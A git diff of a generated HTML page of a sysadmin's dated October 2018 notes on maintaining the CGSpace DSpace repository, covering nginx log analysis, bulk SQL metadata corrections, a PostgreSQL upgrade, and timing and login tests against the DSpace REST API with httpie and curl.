<pre tabindex="0"><code># grep 138.201.49.199 /var/log/nginx/access.log | grep -o -E &#39;GET /handle/[0-9]{5}&#39; | sort | uniq -c
7 GET /handle/10568
4186 GET /handle/10947
</code></pre><ul>
@ -187,19 +187,19 @@ Given Names Deactivated Family Name Deactivated: 0000-0001-7930-5752
<li>I looked in Solr&rsquo;s statistics core and these hits were actually all counted as <code>isBot:false</code> (of course)&hellip; hmmm</li>
<li>I tagged all of Sonal and Phil&rsquo;s items with their ORCID identifiers on CGSpace using my <a href="https://gist.github.com/alanorth/a49d85cd9c5dea89cddbe809813a7050">add-orcid-identifiers.py</a> script:</li>
</ul>
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i 2018-10-03-add-orcids.csv -db dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i 2018-10-03-add-orcids.csv -db dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>Where <code>2018-10-03-add-orcids.csv</code> contained:</li>
</ul>
<pre tabindex="0"><code>dc.contributor.author,cg.creator.id
&quot;Henson, Sonal P.&quot;,Sonal Henson: 0000-0002-2002-5462
&quot;Henson, S.&quot;,Sonal Henson: 0000-0002-2002-5462
&quot;Thornton, P.K.&quot;,Philip Thornton: 0000-0002-1854-0182
&quot;Thornton, Philip K&quot;,Philip Thornton: 0000-0002-1854-0182
&quot;Thornton, Phil&quot;,Philip Thornton: 0000-0002-1854-0182
&quot;Thornton, Philip K.&quot;,Philip Thornton: 0000-0002-1854-0182
&quot;Thornton, Phillip&quot;,Philip Thornton: 0000-0002-1854-0182
&quot;Thornton, Phillip K.&quot;,Philip Thornton: 0000-0002-1854-0182
</code></pre><h2 id="2018-10-04">2018-10-04</h2>
<ul>
<li>Salem raised an issue that the dspace-statistics-api reports downloads for some items that have no bitstreams (like many limited access items)</li>
@ -214,7 +214,7 @@ Given Names Deactivated Family Name Deactivated: 0000-0001-7930-5752
<li>So it&rsquo;s fixed, but I&rsquo;m not sure why!</li>
<li>Peter wants to know the number of API requests per month, which was about 250,000 in September (excluding statlet requests):</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/{oai,rest}.log* | grep -E 'Sep/2018' | grep -c -v 'statlets'
<pre tabindex="0"><code># zcat --force /var/log/nginx/{oai,rest}.log* | grep -E &#39;Sep/2018&#39; | grep -c -v &#39;statlets&#39;
251226
</code></pre><ul>
<li>I found a logic error in the dspace-statistics-api <code>indexer.py</code> script that was causing item views to be inserted into downloads</li>
@ -243,7 +243,7 @@ Given Names Deactivated Family Name Deactivated: 0000-0001-7930-5752
<li>When I tried to force them to be generated I got an error that I&rsquo;ve never seen before:</li>
</ul>
<pre tabindex="0"><code>$ dspace filter-media -v -f -i 10568/97613
org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: not authorized `/tmp/impdfthumb5039464037201498062.pdf' @ error/constitute.c/ReadImage/412.
</code></pre><ul>
<li>I see there was an update to Ubuntu&rsquo;s ImageMagick on 2018-10-05, so maybe something changed or broke?</li>
<li>I get the same error when forcing <code>filter-media</code> to run on DSpace Test too, so it&rsquo;s gotta be an ImageMagick bug</li>
@ -251,7 +251,7 @@ org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.c
<li>Wow, someone on <a href="https://twitter.com/rosscampbell/status/1048268966819319808">Twitter posted about this breaking his web application</a> (and it was retweeted by the ImageMagick account!)</li>
<li>I commented out the line that disables PDF thumbnails in <code>/etc/ImageMagick-6/policy.xml</code>:</li>
</ul>
<pre tabindex="0"><code> &lt;!--&lt;policy domain=&quot;coder&quot; rights=&quot;none&quot; pattern=&quot;PDF&quot; /&gt;--&gt;
<pre tabindex="0"><code> &lt;!--&lt;policy domain=&#34;coder&#34; rights=&#34;none&#34; pattern=&#34;PDF&#34; /&gt;--&gt;
</code></pre><ul>
<li>This works, but I&rsquo;m not sure what ImageMagick&rsquo;s long-term plan is if they are going to disable ALL image formats&hellip;</li>
<li>I suppose I need to enable a workaround for this in Ansible?</li>
@ -274,9 +274,9 @@ $ sudo podman create --name dspacedb -v /home/aorth/.local/lib/containers/volume
$ sudo podman start dspacedb
$ createuser -h localhost -U postgres --pwprompt dspacetest
$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost ~/Downloads/cgspace_2018-10-11.backup
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
$ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
</code></pre><ul>
<li>I tried to make an Artifactory in podman, but it seems to have problems because Artifactory is distributed on the Bintray repository</li>
@ -311,7 +311,7 @@ COPY 10000
</code></pre><ul>
<li>Then I exported and applied them on my local test server:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2018-10-11-top-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t CORRECT -m 3
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2018-10-11-top-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t CORRECT -m 3
</code></pre><ul>
<li>I will apply these on CGSpace when I do the other updates tomorrow, as well as double check the high scoring ones to see if they are correct in Sisay&rsquo;s author controlled vocabulary</li>
</ul>
@ -321,7 +321,7 @@ COPY 10000
<li>Switch to new CGIAR LDAP server on CGSpace, as it&rsquo;s been running (at least for authentication) on DSpace Test for the last few weeks, and I think the old one will be deprecated soon (today?)</li>
<li>Apply Peter&rsquo;s 746 author corrections on CGSpace and DSpace Test using my <a href="https://gist.github.com/alanorth/df92cbfb54d762ba21b28f7cd83b6897">fix-metadata-values.py</a> script:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-10-11-top-authors.csv -f dc.contributor.author -t CORRECT -m 3 -db dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-10-11-top-authors.csv -f dc.contributor.author -t CORRECT -m 3 -db dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>Run all system updates on CGSpace (linode19) and reboot the server</li>
<li>After rebooting the server I noticed that Handles are not resolving, and the <code>dspace-handle-server</code> systemd service is not running (or rather, it exited with success)</li>
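<li>The usual systemd checks apply here (nothing DSpace-specific):</li>
</ul>
<pre tabindex="0"><code># systemctl status dspace-handle-server
# journalctl -u dspace-handle-server -n 50
# systemctl restart dspace-handle-server
</code></pre>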
@ -356,20 +356,20 @@ COPY 10000
$ sudo docker run --name dspacedb -v /home/aorth/.local/lib/containers/volumes/dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
$ createuser -h localhost -U postgres --pwprompt dspacetest
$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost ~/Downloads/cgspace_2018-10-11.backup
$ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
</code></pre><h2 id="2018-10-16">2018-10-16</h2>
<ul>
<li>Generate a list of the schema on CGSpace so CodeObia can compare with MELSpace:</li>
</ul>
<pre tabindex="0"><code>dspace=# \copy (SELECT (CASE when metadata_schema_id=1 THEN 'dc' WHEN metadata_schema_id=2 THEN 'cg' END) AS schema, element, qualifier, scope_note FROM metadatafieldregistry where metadata_schema_id IN (1,2)) TO /tmp/cgspace-schema.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \copy (SELECT (CASE when metadata_schema_id=1 THEN &#39;dc&#39; WHEN metadata_schema_id=2 THEN &#39;cg&#39; END) AS schema, element, qualifier, scope_note FROM metadatafieldregistry where metadata_schema_id IN (1,2)) TO /tmp/cgspace-schema.csv WITH CSV HEADER;
</code></pre><ul>
<li>Talking to the CodeObia guys about the REST API I started to wonder why it&rsquo;s so slow and how I can quantify it in order to ask the dspace-tech mailing list for help profiling it</li>
<li>Interestingly, the speed doesn&rsquo;t get better after you request the same thing multiple times; it&rsquo;s consistently bad on both CGSpace and DSpace Test!</li>
</ul>
<pre tabindex="0"><code>$ time http --print h 'https://cgspace.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=100&amp;offset=0'
<pre tabindex="0"><code>$ time http --print h &#39;https://cgspace.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=100&amp;offset=0&#39;
...
0.35s user 0.06s system 1% cpu 25.133 total
0.31s user 0.04s system 1% cpu 25.223 total
@ -377,7 +377,7 @@ $ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser
0.20s user 0.05s system 1% cpu 23.838 total
0.30s user 0.05s system 1% cpu 24.301 total
$ time http --print h 'https://dspacetest.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=100&amp;offset=0'
...
0.22s user 0.03s system 1% cpu 17.248 total
0.23s user 0.02s system 1% cpu 16.856 total
@ -389,7 +389,7 @@ $ time http --print h 'https://dspacetest.cgiar.org/rest/items?expand=metadata,b
<li>I wonder if the Java garbage collector is important here, or if there are missing indexes in PostgreSQL?</li>
<li>I switched DSpace Test to the G1GC garbage collector and tried again and now the results are worse!</li>
</ul>
<pre tabindex="0"><code>$ time http --print h 'https://dspacetest.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=100&amp;offset=0'
<pre tabindex="0"><code>$ time http --print h &#39;https://dspacetest.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=100&amp;offset=0&#39;
...
0.20s user 0.03s system 0% cpu 25.017 total
0.23s user 0.02s system 1% cpu 23.299 total
@ -399,7 +399,7 @@ $ time http --print h 'https://dspacetest.cgiar.org/rest/items?expand=metadata,b
</code></pre><ul>
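<li>To at least rule out missing indexes I can check PostgreSQL&rsquo;s table statistics for tables that get mostly sequential scans (a rough heuristic, not proof):</li>
</ul>
<pre tabindex="0"><code>dspace=# SELECT relname, seq_scan, idx_scan FROM pg_stat_user_tables ORDER BY seq_scan DESC LIMIT 10;
</code></pre><ul>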
<li>If I make a request without the expands it is ten times faster:</li>
</ul>
<pre tabindex="0"><code>$ time http --print h 'https://dspacetest.cgiar.org/rest/items?limit=100&amp;offset=0'
<pre tabindex="0"><code>$ time http --print h &#39;https://dspacetest.cgiar.org/rest/items?limit=100&amp;offset=0&#39;
...
0.20s user 0.03s system 7% cpu 3.098 total
0.22s user 0.03s system 8% cpu 2.896 total
@ -414,29 +414,29 @@ $ time http --print h 'https://dspacetest.cgiar.org/rest/items?expand=metadata,b
<li>Most of them are from Bioversity, and I asked Maria for permission before updating them</li>
<li>I manually went through and looked at the existing values and updated them in several batches:</li>
</ul>
<pre tabindex="0"><code>UPDATE metadatavalue SET text_value='CC-BY-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%CC BY %';
UPDATE metadatavalue SET text_value='CC-BY-NC-ND-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%4.0%' AND text_value LIKE '%BY-NC-ND%' AND text_value LIKE '%by-nc-nd%';
UPDATE metadatavalue SET text_value='CC-BY-NC-SA-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%4.0%' AND text_value LIKE '%BY-NC-SA%' AND text_value LIKE '%by-nc-sa%';
UPDATE metadatavalue SET text_value='CC-BY-3.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%3.0%' AND text_value LIKE '%/by/%';
UPDATE metadatavalue SET text_value='CC-BY-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%4.0%' AND text_value LIKE '%/by/%' AND text_value NOT LIKE '%zero%';
UPDATE metadatavalue SET text_value='CC-BY-NC-2.5' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE
'%/by-nc%' AND text_value LIKE '%2.5%';
UPDATE metadatavalue SET text_value='CC-BY-NC-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%/by-nc%' AND text_value LIKE '%4.0%';
UPDATE metadatavalue SET text_value='CC-BY-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%4.0%' AND text_value LIKE '%Attribution %' AND text_value NOT LIKE '%zero%';
UPDATE metadatavalue SET text_value='CC-BY-NC-SA-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value NOT LIKE '%zero%' AND text_value LIKE '%4.0%' AND text_value LIKE '%Attribution-NonCommercial-ShareAlike%';
UPDATE metadatavalue SET text_value='CC-BY-NC-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%4.0%' AND text_value NOT LIKE '%zero%' AND text_value LIKE '%Attribution-NonCommercial %';
UPDATE metadatavalue SET text_value='CC-BY-NC-3.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%3.0%' AND text_value NOT LIKE '%zero%' AND text_value LIKE '%Attribution-NonCommercial %';
UPDATE metadatavalue SET text_value='CC-BY-3.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%3.0%' AND text_value NOT LIKE '%zero%' AND text_value LIKE '%Attribution %';
UPDATE metadatavalue SET text_value='CC-BY-ND-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND resource_id=78184;
UPDATE metadatavalue SET text_value='CC-BY' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value NOT LIKE '%zero%' AND text_value NOT LIKE '%CC0%' AND text_value LIKE '%Attribution %' AND text_value NOT LIKE '%CC-%';
UPDATE metadatavalue SET text_value='CC-BY-NC-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND resource_id=78564;
<pre tabindex="0"><code>UPDATE metadatavalue SET text_value=&#39;CC-BY-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%CC BY %&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-NC-ND-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%4.0%&#39; AND text_value LIKE &#39;%BY-NC-ND%&#39; AND text_value LIKE &#39;%by-nc-nd%&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-NC-SA-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%4.0%&#39; AND text_value LIKE &#39;%BY-NC-SA%&#39; AND text_value LIKE &#39;%by-nc-sa%&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-3.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%3.0%&#39; AND text_value LIKE &#39;%/by/%&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%4.0%&#39; AND text_value LIKE &#39;%/by/%&#39; AND text_value NOT LIKE &#39;%zero%&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-NC-2.5&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE
&#39;%/by-nc%&#39; AND text_value LIKE &#39;%2.5%&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-NC-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%/by-nc%&#39; AND text_value LIKE &#39;%4.0%&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%4.0%&#39; AND text_value LIKE &#39;%Attribution %&#39; AND text_value NOT LIKE &#39;%zero%&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-NC-SA-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value NOT LIKE &#39;%zero%&#39; AND text_value LIKE &#39;%4.0%&#39; AND text_value LIKE &#39;%Attribution-NonCommercial-ShareAlike%&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-NC-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%4.0%&#39; AND text_value NOT LIKE &#39;%zero%&#39; AND text_value LIKE &#39;%Attribution-NonCommercial %&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-NC-3.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%3.0%&#39; AND text_value NOT LIKE &#39;%zero%&#39; AND text_value LIKE &#39;%Attribution-NonCommercial %&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-3.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%3.0%&#39; AND text_value NOT LIKE &#39;%zero%&#39; AND text_value LIKE &#39;%Attribution %&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-ND-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND resource_id=78184;
UPDATE metadatavalue SET text_value=&#39;CC-BY&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value NOT LIKE &#39;%zero%&#39; AND text_value NOT LIKE &#39;%CC0%&#39; AND text_value LIKE &#39;%Attribution %&#39; AND text_value NOT LIKE &#39;%CC-%&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-NC-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND resource_id=78564;
</code></pre><ul>
<li>I updated the fields on CGSpace and then started a re-index of Discovery</li>
<li>We also need to re-think the <code>dc.rights</code> field in the submission form: we should probably use a popup controlled vocabulary and list the Creative Commons values with version numbers and allow the user to enter their own (like the ORCID identifier field)</li>
<li>Ask Jane if we can use some of the BDP money to host AReS explorer on a more powerful server</li>
<li>IWMI sent me a list of new ORCID identifiers for their staff so I combined them with our list, updated the names with my <a href="https://gist.github.com/alanorth/57a88379126d844563c1410bd7b8d12b">resolve-orcids.py</a> script, and regenerated the controlled vocabulary:</li>
</ul>
<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml MEL\ ORCID.json MEL\ ORCID_V2.json 2018-10-17-IWMI-ORCIDs.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq &gt;
<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml MEL\ ORCID.json MEL\ ORCID_V2.json 2018-10-17-IWMI-ORCIDs.txt | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq &gt;
2018-10-17-orcids.txt
$ ./resolve-orcids.py -i 2018-10-17-orcids.txt -o 2018-10-17-names.txt -d
$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
@ -458,7 +458,7 @@ Given Names Deactivated Family Name Deactivated: 0000-0001-7930-5752
<li>I upgraded PostgreSQL to 9.6 on DSpace Test using Ansible, then had to manually <a href="https://wiki.postgresql.org/wiki/Using_pg_upgrade_on_Ubuntu/Debian">migrate from 9.5 to 9.6</a>:</li>
</ul>
<pre tabindex="0"><code># su - postgres
$ /usr/lib/postgresql/9.6/bin/pg_upgrade -b /usr/lib/postgresql/9.5/bin -B /usr/lib/postgresql/9.6/bin -d /var/lib/postgresql/9.5/main -D /var/lib/postgresql/9.6/main -o ' -c config_file=/etc/postgresql/9.5/main/postgresql.conf' -O ' -c config_file=/etc/postgresql/9.6/main/postgresql.conf'
$ exit
# systemctl start postgresql
# dpkg -r postgresql-9.5 postgresql-client-9.5 postgresql-contrib-9.5
@ -468,7 +468,7 @@ $ exit
<li>Linode emailed me to say that CGSpace (linode18) had high CPU usage for a few hours this afternoon</li>
<li>Looking at the nginx logs around that time I see the following IPs making the most requests:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;19/Oct/2018:(12|13|14|15)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;19/Oct/2018:(12|13|14|15)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
361 207.46.13.179
395 181.115.248.74
485 66.249.64.93
@ -491,14 +491,14 @@ $ exit
$ sudo docker run --name my_solr -v ~/dspace/solr/statistics/conf:/tmp/conf -d -p 8983:8983 -t solr:5
$ sudo docker logs my_solr
...
ERROR: Error CREATEing SolrCore 'statistics': Unable to create core [statistics] Caused by: solr.IntField
ERROR: Error CREATEing SolrCore &#39;statistics&#39;: Unable to create core [statistics] Caused by: solr.IntField
</code></pre><ul>
<li>Apparently a bunch of variable types were removed in <a href="https://issues.apache.org/jira/browse/SOLR-5936">Solr 5</a></li>
<li>So for now it&rsquo;s actually a huge pain in the ass to run the tests for my dspace-statistics-api</li>
<li>Linode sent a message that the CPU usage was high on CGSpace (linode18) last night</li>
<li>According to the nginx logs around that time it was 5.9.6.51 (MegaIndex) again:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;20/Oct/2018:(14|15|16)&quot; | awk '{print $1}' | sort
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;20/Oct/2018:(14|15|16)&#34; | awk &#39;{print $1}&#39; | sort
| uniq -c | sort -n | tail -n 10
249 207.46.13.179
250 157.55.39.173
@ -520,12 +520,12 @@ ERROR: Error CREATEing SolrCore 'statistics': Unable to create core [statistics]
/var/log/nginx/oai.log:0
/var/log/nginx/rest.log:0
/var/log/nginx/statistics.log:0
# grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51' dspace.log.2018-10-20 | sort | uniq
# grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51&#39; dspace.log.2018-10-20 | sort | uniq
8915
</code></pre><ul>
<li>Last month I added &ldquo;crawl&rdquo; to the Tomcat Crawler Session Manager Valve&rsquo;s regular expression matching (see the configuration sketch below), and it seems to be working for MegaIndex&rsquo;s user agent:</li>
</ul>
<pre tabindex="0"><code>$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/1' User-Agent:'&quot;Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)&quot;'
<pre tabindex="0"><code>$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/1&#39; User-Agent:&#39;&#34;Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)&#34;&#39;
</code></pre><ul>
<li>So I&rsquo;m not sure why this bot uses so many sessions. Is it because it requests very slowly?</li>
</ul>
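<ul>
<li>For reference, the valve is enabled with a single line in Tomcat&rsquo;s <code>server.xml</code>; a minimal sketch, assuming the stock <code>crawlerUserAgents</code> pattern with &ldquo;crawl&rdquo; appended (illustrative, not our exact production value):</li>
</ul>
<pre tabindex="0"><code>&lt;Valve className=&#34;org.apache.catalina.valves.CrawlerSessionManagerValve&#34;
       crawlerUserAgents=&#34;.*[bB]ot.*|.*Yahoo! Slurp.*|.*Feedfetcher-Google.*|.*crawl.*&#34; /&gt;
</code></pre>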
@ -539,7 +539,7 @@ ERROR: Error CREATEing SolrCore 'statistics': Unable to create core [statistics]
<li>Change <code>build.properties</code> to use HTTPS for Handles in our <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure playbooks</a></li>
<li>We will still need to do a batch update of the <code>dc.identifier.uri</code> and other fields in the database:</li>
</ul>
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value=replace(text_value, 'http://', 'https://') WHERE resource_type_id=2 AND text_value LIKE 'http://hdl.handle.net%';
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value=replace(text_value, &#39;http://&#39;, &#39;https://&#39;) WHERE resource_type_id=2 AND text_value LIKE &#39;http://hdl.handle.net%&#39;;
</code></pre><ul>
<li>While I was doing that I found two items using CGSpace URLs instead of handles in their <code>dc.identifier.uri</code> so I corrected those</li>
<li>I also found several items that had invalid characters or multiple Handles in some related URL field like <code>cg.link.reference</code> so I corrected those too</li>
@ -547,7 +547,7 @@ ERROR: Error CREATEing SolrCore 'statistics': Unable to create core [statistics]
<li>I deployed the changes on CGSpace, ran all system updates, and rebooted the server</li>
<li>Also, I updated all Handles in the database to use HTTPS:</li>
</ul>
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value=replace(text_value, 'http://', 'https://') WHERE resource_type_id=2 AND text_value LIKE 'http://hdl.handle.net%';
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value=replace(text_value, &#39;http://&#39;, &#39;https://&#39;) WHERE resource_type_id=2 AND text_value LIKE &#39;http://hdl.handle.net%&#39;;
UPDATE 76608
</code></pre><ul>
<li>Skype with Peter about ToRs for the AReS open source work and future plans to develop tools around the DSpace ecosystem</li>
@ -560,20 +560,20 @@ UPDATE 76608
<li>I emailed the MARLO guys to ask if they can send us a dump of rights data and Handles from their system so we can tag our older items on CGSpace</li>
<li>Testing REST login and logout via httpie because Felix from Earlham says he&rsquo;s having issues:</li>
</ul>
<pre tabindex="0"><code>$ http --print b POST 'https://dspacetest.cgiar.org/rest/login' email='testdeposit@cgiar.org' password=deposit
<pre tabindex="0"><code>$ http --print b POST &#39;https://dspacetest.cgiar.org/rest/login&#39; email=&#39;testdeposit@cgiar.org&#39; password=deposit
acef8a4a-41f3-4392-b870-e873790f696b
$ http POST 'https://dspacetest.cgiar.org/rest/logout' rest-dspace-token:acef8a4a-41f3-4392-b870-e873790f696b
$ http POST &#39;https://dspacetest.cgiar.org/rest/logout&#39; rest-dspace-token:acef8a4a-41f3-4392-b870-e873790f696b
</code></pre><ul>
<li>Also works via curl (login, check status, logout, check status):</li>
</ul>
<pre tabindex="0"><code>$ curl -H &quot;Content-Type: application/json&quot; --data '{&quot;email&quot;:&quot;testdeposit@cgiar.org&quot;, &quot;password&quot;:&quot;deposit&quot;}' https://dspacetest.cgiar.org/rest/login
<pre tabindex="0"><code>$ curl -H &#34;Content-Type: application/json&#34; --data &#39;{&#34;email&#34;:&#34;testdeposit@cgiar.org&#34;, &#34;password&#34;:&#34;deposit&#34;}&#39; https://dspacetest.cgiar.org/rest/login
e09fb5e1-72b0-4811-a2e5-5c1cd78293cc
$ curl -X GET -H &quot;Content-Type: application/json&quot; -H &quot;Accept: application/json&quot; -H &quot;rest-dspace-token: e09fb5e1-72b0-4811-a2e5-5c1cd78293cc&quot; https://dspacetest.cgiar.org/rest/status
{&quot;okay&quot;:true,&quot;authenticated&quot;:true,&quot;email&quot;:&quot;testdeposit@cgiar.org&quot;,&quot;fullname&quot;:&quot;Test deposit&quot;,&quot;token&quot;:&quot;e09fb5e1-72b0-4811-a2e5-5c1cd78293cc&quot;}
$ curl -X POST -H &quot;Content-Type: application/json&quot; -H &quot;rest-dspace-token: e09fb5e1-72b0-4811-a2e5-5c1cd78293cc&quot; https://dspacetest.cgiar.org/rest/logout
$ curl -X GET -H &quot;Content-Type: application/json&quot; -H &quot;Accept: application/json&quot; -H &quot;rest-dspace-token: e09fb5e1-72b0-4811-a2e5-5c1cd78293cc&quot; https://dspacetest.cgiar.org/rest/status
{&quot;okay&quot;:true,&quot;authenticated&quot;:false,&quot;email&quot;:null,&quot;fullname&quot;:null,&quot;token&quot;:null}%
$ curl -X GET -H &#34;Content-Type: application/json&#34; -H &#34;Accept: application/json&#34; -H &#34;rest-dspace-token: e09fb5e1-72b0-4811-a2e5-5c1cd78293cc&#34; https://dspacetest.cgiar.org/rest/status
{&#34;okay&#34;:true,&#34;authenticated&#34;:true,&#34;email&#34;:&#34;testdeposit@cgiar.org&#34;,&#34;fullname&#34;:&#34;Test deposit&#34;,&#34;token&#34;:&#34;e09fb5e1-72b0-4811-a2e5-5c1cd78293cc&#34;}
$ curl -X POST -H &#34;Content-Type: application/json&#34; -H &#34;rest-dspace-token: e09fb5e1-72b0-4811-a2e5-5c1cd78293cc&#34; https://dspacetest.cgiar.org/rest/logout
$ curl -X GET -H &#34;Content-Type: application/json&#34; -H &#34;Accept: application/json&#34; -H &#34;rest-dspace-token: e09fb5e1-72b0-4811-a2e5-5c1cd78293cc&#34; https://dspacetest.cgiar.org/rest/status
{&#34;okay&#34;:true,&#34;authenticated&#34;:false,&#34;email&#34;:null,&#34;fullname&#34;:null,&#34;token&#34;:null}%
</code></pre><ul>
<li>Improve the documentation of my <a href="https://github.com/alanorth/dspace-statistics-api">dspace-statistics-api</a></li>
<li>Email Modi and Jayashree from ICRISAT to ask if they want to join CGSpace as partners</li>

View File

@ -36,7 +36,7 @@ Send a note about my dspace-statistics-api to the dspace-tech mailing list
Linode has been sending mails a few times a day recently that CGSpace (linode18) has had high CPU usage
Today these are the top 10 IPs:
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -132,7 +132,7 @@ Today these are the top 10 IPs:
<li>Linode has been sending mails a few times a day recently that CGSpace (linode18) has had high CPU usage</li>
<li>Today these are the top 10 IPs:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;03/Nov/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
